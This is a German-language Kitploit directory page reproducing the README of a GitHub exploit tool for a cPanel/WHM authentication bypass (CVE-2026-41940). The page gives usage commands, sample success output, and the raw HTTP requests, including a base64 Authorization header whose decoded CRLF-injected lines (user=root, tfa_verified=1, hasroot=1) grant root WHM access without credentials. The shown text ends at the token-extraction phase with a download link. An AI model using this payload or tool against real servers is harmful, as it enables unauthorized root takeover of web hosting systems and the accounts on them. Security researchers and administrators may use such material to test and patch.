Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — Kritischer Exploit zur Umgehung der Authentifizierung für cPanel/WHM CVE-2026-41940. Nutzt CRLF-Injection im cpsrvd-Daemon, um ohne Anmeldedaten Root-WHM-Zugriff zu erlangen. Enthält Versionserkennung, ausführliche Protokollierung, Proxy-Unterstützung, JSON-Reporting und Post-Exploitation-Kontenumeration. Nur für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
Authentifizierung & AutorisierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Repository anzeigen
212vor 2 MonatenNoch nicht geprüft

Kritischer Exploit zur Umgehung der Authentifizierung für cPanel/WHM CVE-2026-41940. Nutzt CRLF-Injection im cpsrvd-Daemon, um ohne Anmeldedaten Root-WHM-Zugriff zu erlangen. Enthält Versionserkennung, ausführliche Protokollierung, Proxy-Unterstützung, JSON-Reporting und Post-Exploitation-Kontenumeration. Nur für autorisierte Sicherheitstests.

Teilen

CVE-2026-41940 - cPanel & WHM Authentifizierungs-Bypass-Exploit

PythonLicenseCVECVSSStatus

Kritischer Authentifizierungs-Bypass durch CRLF-Injection im cPanel/WHM-cpsrvd-Daemon


📋 Übersicht

Bei CVE-2026-41940 handelt es sich um eine kritische Authentifizierungs-Bypass-Schwachstelle in cPanel & WHM, die nicht authentifizierten Remote-Angreifern administrativen Zugriff mit Root-Rechten auf den Server ermöglicht. Die Schwachstelle liegt in der Session-Verwaltung des cpsrvd-Daemons, genauer gesagt in Cpanel/Session.pm, wo eine unzureichende Neutralisierung von Zeilentrennzeichen (CRLF) im whostmgrsession-Cookie und in Authorization-Headern die Injection von Session-Parametern ermöglicht.

CVSS-ScoreExploit-TypAuswirkungAngriffsvektor
9.8Authentifizierungs-BypassRoot-ZugriffNetzwerk
c

⚡ Hauptfunktionen

Dieses Exploit-Tool bietet die folgenden Hauptfunktionen:

  • 🔓 Authentifizierungs-Bypass – Root-WHM-Zugriff ohne Anmeldedaten erlangen

  • 🛡️ Mehrere Bypass-Techniken – Verschiedene Verifizierungsmethoden werden automatisch ausprobiert

  • 🌐 Proxy-Unterstützung – Verkehr über HTTP/HTTPS-Proxys leiten

  • 📊 JSON-Berichte – Detaillierte Bewertungsberichte erstellen

  • 📝 Umfassende Protokollierung – Ausführlicher Debug-Modus mit Zeitstempeln

  • 🔍 Versionserkennung – Verwundbare Versionen automatisch erkennen und prüfen

  • 👥 Konto-Enumeration – Alle cPanel-Konten nach dem Exploit auflisten

  • 🎯 Mehrere Endpunkte – Verschiedene API-Endpunkte zur Verifizierung ausprobieren


🚨 Details zur Schwachstelle

AttributWert
CVE-IDCVE-2026-41940
CVSS-Score9.8 (Kritisch)
SchwachstellentypAuthentifizierungs-Bypass durch CRLF-Injection
Betroffene Komponentecpsrvd-Daemon (Cpanel/Session.pm)
AngriffsvektorNetzwerk
AuswirkungVoller Root-Zugriff
AusnutzungNicht authentifiziert, Remote

🔬 Technische Analyse

Die Schwachstelle beruht auf zwei Hauptproblemen:

  1. CRLF-Injection im Session-Speicher – Die Funktion saveSession bereinigt Zeilenumbruchzeichen (\n) im Feld pass nicht, bevor der Wert in die Session-Datei geschrieben wird, wodurch die Injection beliebiger Session-Parameter ermöglicht wird.

  2. Bedingter Encoding-Bypass – Wenn dem Session-Cookie der Teil ob (das Segment nach dem Komma) fehlt, wird der Wert von pass unkodiert (im Klartext) geschrieben, was die Injection von CRLF-Sequenzen ermöglicht.

🎯 Betroffene Versionen

Release-TrackVerwundbar bisGepatchte Version
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5

📦 Installation

Voraussetzungen

# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

Requirements-Datei

requests>=2.28.0
urllib3>=1.26.0

Repository klonen

git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 Verwendung

Grundlegende Verwendung

python3 exploit.py --target https://target.com:2087

Erweiterte Verwendung

# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

Beispielausgabe

=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 Befehlszeilenargumente

ArgumentKurzErforderlichBeschreibung
--target-t✅Ziel-URL (z. B. https://target.com:2087 )
--verbose-v❌Ausführliche/Debug-Ausgabe aktivieren
--proxy-p❌Proxy-URL (z. B. http://127.0.0.1:8080 )
--output-o❌Ausgabedatei für den JSON-Bericht
--timeout❌Anfrage-Timeout in Sekunden (Standard: 10)
--list-accounts-l❌cPanel-Konten nach erfolgreichem Exploit auflisten
--version❌Exploit-Version anzeigen

🔬 Exploit-Methodik

Phase 1: Pre-Auth-Session erzeugen

Der Exploit erhält zunächst ein Pre-Authentifizierungs-Session-Cookie, indem er einen fehlgeschlagenen Login versucht:

POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

Antwort:

Set-Cookie: whostmgrsession=base64_encoded_data

Phase 2: CRLF-Injection

Der manipulierte Authorization-Header injiziert bösartige Session-Parameter:

GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

Dekodierte Payload:

root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

Phase 3: Token-Extraktion

Tool herunterladen